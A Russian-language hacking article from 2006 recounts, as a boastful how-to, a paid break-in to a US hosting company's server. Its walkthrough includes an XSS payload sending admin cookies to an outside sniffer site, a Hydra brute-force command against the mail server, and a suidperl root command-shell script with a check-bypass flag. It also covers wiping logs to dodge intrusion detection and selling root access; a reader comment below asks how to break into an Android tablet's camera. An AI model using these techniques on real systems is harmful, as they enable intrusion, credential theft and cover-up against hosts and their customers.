Контакты

Для связи с нами можно использовать:
irc://irc.chatnet.ru:#gfs
icq://546460
email://cobalt[@]gfs-team.ru

Все материалы предоставлены только с ознакомительной целью
ГлавнаяСтатьиХакингВзлом хостера, или сказ о том как это бывает на самом деле
© Sh0kk 18.08.2006 статья не оптимизирована

Привет читатель. Сегодня я поведою тебе об увлекательном взломе одного хостера.
Все начилось с того что я получил сообщение на ICQ - в котором говорилось - "
Прив. Есть дело. Нужно зарутать один серв:) Поможешь?" Как выяснилось позже -
челу нужен был баунсер на сервере одном из самых крупнейших хостеров США,
точнее я должен был зарутать серв и отдать челу аксес - фиг знает, может он
реально бы повесил туда баунсер, а может сделал что поинтереснее:). Взлом
произошел около двух недель назад, так что название хостера оставлю в тайне:).
На взлом я согласился сразу - потому что не каждый день мне приходилось щупать
такие мега модные сервера - за которым следят профессиональные админы! Тем
более - в пред оплату я получил весомую сумму wmz.

Зарядив в браузер свежий прокс, я полез на главную страницу портала. Сразу в
глаза бросилось куча флэша, рекламы и сообщений типа: "сегодня мы стали еще
безопаснее - на сервера поставили новые системы защиты!". Мне стало как то не
по себе - но я решил пойти дальше. Первым делом на мой "тест" багов попал форум.
Как я и ожидал это не был не phpBB ни IPB, это был заказной движок. Но через
несколько минут я забил на идею найти там баги:(. Я не отставал от мысли найти
быстрый баг... Так как больше ничего обнаружено не было, я приступил к самому
сайту. Первая ссылка которая попала ко мне на внимание
www.megahoster.com/pairs/index.php?ty=1. Попробовав поставить в конец кавычку
(") я получил облом. Еще несколько минут поэкспериментировав подставляя разные
параметры, я забил и на это.
Наворачивая второй круг по системе, я зарегался на форуме. И тут же обнаружил
банальную XSS!!!
Я смог добиться алерта, а потом и словить свои плюшки записав xss скрипт :
"><script>alert(document.cookie)</script>. Ничего ни фильтровалось в разделе
где я мог написать о себе. Теперь мне нужно было выполнить xss команду которая
утащит админские плюшки: >asd <script language="javascript"> open("http://www.xssmysite.ru/snif.php?"+document.cookie); </script> <a>..
Как видишь я заюзал самопальный скрипт, на моем сайте, ты же для этой цели
можешь завести собственный сниффер на сайте www.antichat.ru.
После того как я отправил админу письмо, где написал что нашел SQL инжект по
следующей ссылке - я прождал два дня. Но я ни получил долгожданные кукисы . На
xss решено было забить. Тем более что ip моего проксика, больше не имел доступа
к серверу, а мой аккаунт на форуме был удален! Видно было что админ поработал на
славу:).
"Забивать" на все не входило в мои планы, поэтому было решено подойти ко взлому
с иной стороны... Запустив nmap на удаленном шеле, и стал ждать результатов.
Сканер молчал долгое время, но в конце концов показал результат сканирования.
Ничего шокируешего я там ни нашел. Все порты, кроме 80 и порта где вертелся pop3,
были закрыты фаерволом.
Тогда я решил воспользоваться атакой которая называется Reverse IP lookup. Для
танкистов поясню, что эта атака подразумевает получение информации обо всех
виртуальных серверах, расположенных на одной машине с атакуемым ресурсом. Хоть
это был И ХОСТЕР! я надеялся что на этом сервере могут быть и другие проекты -
бывает и такое:))). Но меня ждал облом, кроме www.megahoster.com там ничего не
было... Зато я нашел одну зацепку...
А именно я нашел через сервис whois мыло, и при чем я 100% был уверен что это
был не алиас, а реальное мыло. А теперь думай что я хотел сделать??? Крутиться
pop3, известно мыло john@megahoster.com... Правильно дядюшка брутфорс поможет
мне во взломе!
Ползем на шелл где установлена Hydra и командуем: hydra -l john -P pass.txt -t
80 pop.megahosting.com pop3.
Теперь объясню что означают данные ключи - «-l» указывается логин от мыльника,
после «-P» - файл с паролями, «-t» задает количество потоков, то есть число
одновременных подключений к серверу (не переусердствуй, иначе команда может
просто заглючить, по умолчанию их 16).Кстати, как видишь был заюзал словарик
английских слов - скачанного с моего любимого www.passwords.ru. Теперь
остовалось одно - ждать результата.
Результат заставил себя ждать около 12! часов. Но однако я получил заветный
пасс - Proceedings. "Ну и гуд" - прокрутилось у меня в голове. Теперь мне
остовалось одно - попробовать завалиться - с логином john и пассом Proceedings
на шелл. Как ни странно все подошло!:). Выполнив uname -a я увидел что машине
уставлена FreeBSD 6.0. Потом id и я понял что - wheel это моя группа. Вот так
то! Для начало все было очень даже не плохо;).
А что теперь? я должен был как то захватить систему. Так как сплоитов под эту
систему не было, было решено искать пассы. find ничего не нашел =( но меня это
не расстраивало. В хистори я нашел su на рута. Попробовав ведомый мне пасс, я
обломился. Что же делать теперь? Команда last -10 говорила о том что john
регулярно появляется в системе. Но сейчас в USA была ночь а команда who ничего
не показала, значит можно действовать дальше.
Минут пять я про сидел перед консолью, думая что делать дальше. Первое что я
подумал это установить снифер - и отловить все пассы юзера john. Быть или не
быть ставить или не ставить? Но посмотрев список процессов (ps -ax) я обнаружен
много IDS (Intrusion Detect System) - В частности Short, Chrootkit!!! Так я
решил что снифф данных - ни к чему не приведет, но самое обломное это то что я
испугался что какаянить из этих IDS выследит меня. Но была не была!
Дальше я набрал mc, и стал шариться по системе. В каталоге home было несколько
папок, и /etc/passwd был не очень большой, это мне сказало что к серверу имеют
доступ небольшое число юзеров. Через час рысканья по системе я нашел интересный
suid файл!, который я мог редактировать. Злорадный смех раздался в моем мозге.
Найдя в инете скриптик следующего содержания, я изменил suid файл:
#!/usr/bin/suidperl -U
while(1)
{
print "cmd# ";
$cmd=<>;
chomp($cmd);
$out=`$cmd`;
print $out;
}
Так как suidperl выполняет проверку на потенциально опасные команды - следует
добавить влаг -U, тогда "проверку" можно будет легко обойти.

Теперь я мог выполнять команды с правами рута. Ура! Бастионы супер защит рухнули.
А все IDS идут лесом!
Вскоре я вычистил все логи, подтверждающие что то о моем взломе (Не забыв и о
Short). И отдал челу рут аксес на сервер - предворительно объяснив чуваку как
использовать suid файл.

PS

Через несколько дней я получил мессагу от моего товарища который говорил что
купил какуе-то базу, одно хостера США. А купил он ее у моего знакомого, ровно в
двое большую сумму которую мне дал мой заказчик за работу! Вот так то;) Учись
комерции, а вось и так почти за даром поимеешь несколько сотен зеленых
президентов:))))

Ну вот как это бывает на самом деле - Сложно? нет! возможно? да. Все зависит от
того - насколько сильно ты хочешь взлома, и хочешь ли вообще.

Хорошего тебе инета, и попутного ветра!


Всегда твой Sh0kk:) ICQ: 272779



© Sh0kk 18.08.2006 статья не оптимизирована

e-Commerce Partners Network
frozen30 написал:

Реально ли проникнуть в Android планшет без троянов и оттуда вытащить файлы? и возможно ли удаленное подключение к вебкамере и динамику? или надо отдельно бэкдор писать? помогите

Ник:

Текст:
P Br B I Qute



Код: обновить
Последние комментарии
26.06.2017 07:33:17 DeweyAloma написал:
If you have a desire to learn how to earn from...
XSS Часть II
26.06.2017 07:09:03 DeweyAloma написал:
If you have a desire to learn how to earn from...
Взлом приложений WEB 2.0 из Firefox
26.06.2017 04:42:47 DeweyAloma написал:
If you have a desire to learn how to earn from...
HTTP. Описание протокола
Реклама

Тут должна была быть ваша реклама, но мы потеряли глиняную табличку с ее текстом. SapeId: 665044

Rambler's Top100